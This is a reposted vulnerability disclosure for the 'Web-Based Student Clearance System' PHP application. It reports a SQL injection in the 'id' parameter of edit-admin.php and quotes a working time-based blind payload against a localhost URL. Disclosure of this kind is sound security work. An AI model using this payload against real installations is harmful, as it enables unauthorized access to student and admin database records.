返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
  • 410
分享到

Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)

phpsqlmysql 2023-09-02 21:09:02 410人浏览 八月长安
摘要

WEB-Based Student Clearance System is vulnerable to a sql Injection(edit-admin.PHP) url:/Admin/edit-

WEB-Based Student Clearance System is vulnerable to a sql Injection(edit-admin.PHP)
url:/Admin/edit-admin.php
URI parameter ‘id’ is vulnerable

Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

在这里插入图片描述

Parameter: #1* (URI)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
Download Code:
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html

来源地址:https://blog.csdn.net/qq_41988749/article/details/127552717

--结束END--

本文标题: Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)

本文链接: https://www.lsjlt.com/news/391477.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作